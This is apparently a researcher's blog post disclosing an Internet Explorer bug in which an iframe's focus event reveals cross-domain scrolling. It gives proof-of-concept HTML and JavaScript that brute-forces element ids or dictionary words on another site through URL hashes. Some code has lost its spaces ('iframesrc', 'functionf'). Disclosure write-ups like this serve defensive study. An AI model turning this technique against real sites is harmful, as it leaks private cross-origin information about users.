X-Domain scroll detection on IE using focus

This is a pretty cool bug. I use the focus event on an iframe to detect if the iframe has been scrolled x-domain. It's because IE fires the onfocus event of the iframe when the scroll occurs. This means using 1 network request we can discover if a site contains a particular id provided the page scrolls inside the iframe. Using multiple iframes you could quite easily bruteforce larger numbers or maybe a dictionary list of words and because we are using hash the future requests aren't sent to the server.

First we need a page with an id we can scroll to.

<p>test</p><p>test</p><p>test</p><p>test</p><p>test</p><divid=1337>target</div>

When visiting this page it should jump to #1337 provided the window is small enough.

Next we create an iframe and attach an onfocus event:

<iframesrc="http://hackvertor.co.uk/scroll/test.html"id="x"onfocus="alert(&apos;the iframe scrolled to:&apos;+window.id);clearTimeout(timer)"name="x"></iframe>

Now we need to create the clicks to trigger the onfocus event and produce the scroll.

id=0;var anchor =document.createElement('a');anchor.target="x";document.body.appendChild(anchor);
 timer=setTimeout(functionf(){ id++;document.getElementById('pos').innerText= id; anchor.href='http://hackvertor.co.uk/scroll/test.html#'+id; anchor.click();if(id<10000){ timer=setTimeout(f,0);}},0)

The code keeps calling itself until 10,000 iterations or until the onfocus event fires and clears the timeout. Which it does on IE with 1337 :)

PoC